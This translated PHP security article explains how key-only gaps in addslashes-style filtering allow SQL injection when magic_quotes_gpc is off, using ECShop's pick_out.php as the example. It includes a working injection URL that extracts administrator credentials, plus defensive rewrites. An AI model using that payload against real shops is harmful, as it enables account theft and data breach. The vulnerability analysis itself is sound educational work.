Attackers can bypass addslashes and preg_replace functions under magic_quotes_gpc = off.

Source: Internet
Author: User
Tags: define, function
Preface
According to some documents published about PHP6 (PHP5 and PHP4 are currently the mainstream), the register_globals, magic_quotes_gpc and safe_mode options will no longer exist. This official decision takes the portability of PHP into account. With the GPC option removed, many programs will have to be rewritten. What exactly will be rewritten? At the very least, a function that simulates magic_quotes_gpc will be added to process incoming data. So studying how such functions can be bypassed when magic_quotes_gpc = off is now very worthwhile.

The addslashes function
Because of the side effects of the GPC option, many programs disable it and instead use PHP's built-in addslashes function to escape input in advance, simulating GPC with a piece of code like the following:

define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
...
foreach (array('_COOKIE', '_POST', '_GET') as $_request) {
    // $$_request is a variable variable: with $_request = '_COOKIE' it is $_COOKIE
    foreach ($$_request as $_key => $_value) {
        // register the value as a global variable unless its name starts with '_'
        // (the original code uses the $_key{0} string-offset syntax, removed in PHP 8)
        $_key[0] != '_' && $$_key = daddslashes($_value);
    }
}
...
function daddslashes($string, $force = 0) { // note the name: daddslashes, not addslashes
    !defined('MAGIC_QUOTES_GPC') && define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
    if (!MAGIC_QUOTES_GPC || $force) {
        if (is_array($string)) {
            foreach ($string as $key => $val) {
                $string[$key] = daddslashes($val, $force); // recurse into array values only
            }
        } else {
            $string = addslashes($string);
        }
    }
    return $string;
}

define and defined are PHP built-in functions: the former defines a constant, the latter checks whether a constant exists. The two nested foreach loops may be hard for some readers to follow. The first passes the strings '_COOKIE', '_POST' and '_GET' to the array function, so $_request becomes an array whose element 0 is '_COOKIE', element 1 is '_POST' and element 2 is '_GET', and the outer foreach walks through these names one by one. The inner foreach then uses $$_request, a variable variable: when $_request holds '_COOKIE', $$_request is $_COOKIE, so the inner loop walks over the familiar $_COOKIE, $_POST and $_GET arrays in turn.
$_key{0} != '_' means the first character of the submitted variable name must not be '_', which is obviously easy to satisfy. When that holds, the value reaches daddslashes($_value) and is registered as a global variable; note that the arguments passed further down are $val and $force.
The last part is the definition of daddslashes. && is the AND operator and || the OR operator: if the MAGIC_QUOTES_GPC constant is not yet defined, the AND expression goes on to define it with the define function. Then, if MAGIC_QUOTES_GPC is off, or $force is set, or both, the function checks whether $string is an array. If so, it loops over it with foreach and calls daddslashes recursively on each element; again the arguments are $val and $force. Otherwise it applies addslashes to the string.
This code needs a little knowledge of operator precedence, default parameter values, recursive calls and so on. It is easy to see that the $string parameter of addslashes ultimately receives $val, the value parameter of daddslashes.
You may think there is nothing to find here, but if you look at how the parameters are passed it is not hard to see that the function only filters the value $val, while the key $_key is never touched. By contrast, when magic_quotes_gpc = on, PHP escapes not only the variable value but also the variable name. daddslashes therefore simulates only part of what GPC does.
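The gap described above, as an added example (not code from the original article, Discuz! or ECShop): a value-only escaper in the spirit of daddslashes beside a variant that also escapes string keys, which is what magic_quotes_gpc = on did. The function names and the sample array are constructed for illustration.

```php
<?php
// Added example, not code from the original article or from Discuz!/ECShop.
// Contrasts value-only escaping with escaping of keys and values.
// The input below is a constructed sample, not a real request.

// Value-only escaping: keys pass through untouched.
function escape_values_only($data)
{
    if (is_array($data)) {
        foreach ($data as $key => $val) {
            $data[$key] = escape_values_only($val);
        }
        return $data;
    }
    return addslashes((string) $data);
}

// Escapes both keys and values, recursively (hypothetical helper name).
function escape_keys_and_values($data)
{
    if (!is_array($data)) {
        return addslashes((string) $data);
    }
    $out = array();
    foreach ($data as $key => $val) {
        // Integer keys have nothing to escape; string keys get the same
        // treatment as values.
        $safe_key = is_int($key) ? $key : addslashes($key);
        $out[$safe_key] = escape_keys_and_values($val);
    }
    return $out;
}

// Returns the string keys that still contain a single quote not preceded
// by a backslash, so the gap is visible as data rather than only in output.
function unescaped_quote_keys(array $escaped)
{
    $bad = array();
    foreach ($escaped as $key => $val) {
        if (is_string($key) && preg_match("/(?<!\\\\)'/", $key)) {
            $bad[] = $key;
        }
    }
    return $bad;
}

// Constructed sample: the single quote sits in a key, not only in a value.
$sample = array("x'y" => 'red', 'color' => "it's");

$values_only = escape_values_only($sample);
$both        = escape_keys_and_values($sample);

echo "value-only escaping, keys with a raw quote: "
   . implode(', ', unescaped_quote_keys($values_only)) . "\n";
echo "key+value escaping, keys with a raw quote: "
   . implode(', ', unescaped_quote_keys($both)) . "\n";
echo "escaped value in both cases: " . $both['color'] . "\n";
```

Run with the PHP CLI: the first line still lists the key x'y, the second lists nothing, and the value is escaped either way. Any code that later concatenates an array key into SQL, as the ECShop example further down does, only benefits from the second variant.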

Example
ECShop is the largest free open-source online shop system. In ECShop versions earlier than v2.6.2, includes/init.php (a file that is included almost everywhere) uses the addslashes_deep function to filter the request arrays when GPC is off:

if (!get_magic_quotes_gpc())
{
    if (!empty($_GET))
    {
        $_GET = addslashes_deep($_GET);
    }
    if (!empty($_POST))
    {
        $_POST = addslashes_deep($_POST);
    }

    $_COOKIE  = addslashes_deep($_COOKIE);
    $_REQUEST = addslashes_deep($_REQUEST);
}

When get_magic_quotes_gpc is off and GET data exists, addslashes_deep filters the PHP built-in $_GET array; $_POST, $_COOKIE and $_REQUEST are handled in the same way. addslashes_deep is defined in includes/lib_base.php and ultimately calls addslashes:

function addslashes_deep($value)
{
    if (empty($value))
    {
        return $value;
    }
    else
    {
        return is_array($value) ? array_map('addslashes_deep', $value) : addslashes($value);
    }
}

If $value is empty, it is returned unchanged. Otherwise the ternary operator "A ? B : C" is used, which is equivalent to:

if (is_array($value))
{
    array_map('addslashes_deep', $value);
}
else
{
    addslashes($value);
}

If $value is an array, the PHP built-in function array_map calls addslashes_deep on every element of the array in turn (recursively); otherwise addslashes escapes the string. The role of array_map is shown by an example:

function cube($n) {
    return $n * $n * $n; // takes the parameter $n and returns its cube
}

$a = array(1, 2, 3, 4, 5); // $a is an array
$b = array_map('cube', $a); // array_map applies cube to every element of $a in turn
print_r($b); // $b is an array; print it

The result displayed is:

Array ( [0] => 1 [1] => 8 [2] => 27 [3] => 64 [4] => 125 )


After reading the function, let's look at the vulnerable file pick_out.php of ECShop:

if (!empty($_GET['attr']))
{
    foreach ($_GET['attr'] as $key => $value)
    {
        $key = intval($key);
        $_GET['attr'][$key] = htmlspecialchars($value);
    }
}
// ... some code omitted ...
$attr_table   = '';
$attr_where   = '';
$attr_url     = '';
$i            = 0;
$goods_result = '';
foreach ($_GET['attr'] AS $key => $value)
{
    $attr_url .= '&attr[' . $key . ']=' . $value;

    $attr_picks[] = $key;
    if ($i > 0)
    {
        if (empty($goods_result))
        {
            break;
        }
        $goods_result = $db->getCol("SELECT goods_id FROM " . $ecs->table('goods_attr') . " WHERE goods_id IN (" . implode(',', $goods_result) . ") AND attr_id = '$key' AND attr_value = '$value'");
    }
    else
    {
        $goods_result = $db->getCol("SELECT goods_id FROM " . $ecs->table('goods_attr') . " WHERE attr_id = '$key' AND attr_value = '$value'");
    }
    $i++;
}

Readers may be puzzled here: what is the problem if PHP's built-in intval function forcibly converts the key to an integer? Look carefully at the first foreach over $_GET['attr'] as $key => $value. Its code can be rewritten as:

...
foreach ($value[$key] = $_GET['attr']) // non-standard notation, written this way only to make the copy easier to see
{
    $key = intval($key);
    $_GET['attr'][$key] = htmlspecialchars($value);
}
...

Here we can see that the as keyword copies each key and each value of $_GET['attr'] into $key and $value on every iteration, but this does not affect the submitted data in $_GET['attr'] (the loop works on copies). Since intval($key) produces a new numeric key, the sanitized value is stored under that numeric key while the entry under the original key stays in the array untouched. Because the file includes init.php, we cannot control the values of $_GET['attr'] (they are escaped), but every key can still be used!
Then comes the second foreach. The $key variable is assigned again on each iteration. Since the program sets $i = 0 just above, the else branch's SQL query is executed first. This loop also only copies $_GET['attr'], but unlike the first one it puts the copied $key straight into the database query. $key is not filtered anywhere, so SQL injection results. The following request constructs the injected SQL statement:

pick_out.php?cat_id=123456&attr[' union select concat(user_name,0x3a,password) AS goods_id FROM ecs_admin_user WHERE action_list='all' limit 1 #]=Tommie
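A hardened rewrite of the attr handling, as an added example (not ECShop's own code or its official fix): instead of writing the sanitized value under intval($key) while the entry under the original key survives, it builds a fresh array that only admits integer keys and escaped scalar values, and the query conditions are built from that array alone. The names filter_attr_params and build_attr_condition are hypothetical, the "?" placeholder assumes a database layer with bound parameters, and $_GET is filled with a constructed sample request.

```php
<?php
// Added example, not ECShop's own code: a hardened version of the
// $_GET['attr'] handling from pick_out.php. Function names are hypothetical
// and the placeholder style is an assumption about the database layer.

// Keeps only non-negative integer keys with scalar values, escaped.
function filter_attr_params(array $raw)
{
    $clean = array();
    foreach ($raw as $key => $value) {
        // PHP already converts purely numeric string keys such as '12' to
        // integers; anything else is dropped instead of being forced to 0.
        if (!is_int($key) || $key < 0) {
            continue;
        }
        if (is_array($value)) {
            continue; // attribute values are scalars
        }
        $clean[$key] = htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
    }
    return $clean;
}

// Returns one WHERE fragment: the attribute id is embedded as an integer and
// the value is left to a bound parameter collected in $params, so neither
// the key nor the value is concatenated into SQL as raw text.
function build_attr_condition($attr_id, $attr_value, array &$params)
{
    $params[] = $attr_value;
    return 'attr_id = ' . (int) $attr_id . ' AND attr_value = ?';
}

// Constructed sample request: one well-formed attribute and one whose key
// carries a single quote, like the key in the request above.
$_GET['attr'] = array(
    '12'  => 'red',
    "1'x" => 'blue',
);

$attr       = filter_attr_params($_GET['attr']);
$params     = array();
$conditions = array();
foreach ($attr as $key => $value) {
    $conditions[] = build_attr_condition($key, $value, $params);
}

echo 'surviving keys: ' . implode(', ', array_keys($attr)) . "\n";
echo 'conditions:     ' . implode(' AND ', $conditions) . "\n";
echo 'bound params:   ' . implode(', ', $params) . "\n";
```

Run with the PHP CLI: only key 12 survives, the condition reads attr_id = 12 AND attr_value = ?, and red is the single bound parameter. Dropping non-integer keys rather than intval()-ing them also avoids collapsing several hostile keys onto attr[0].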
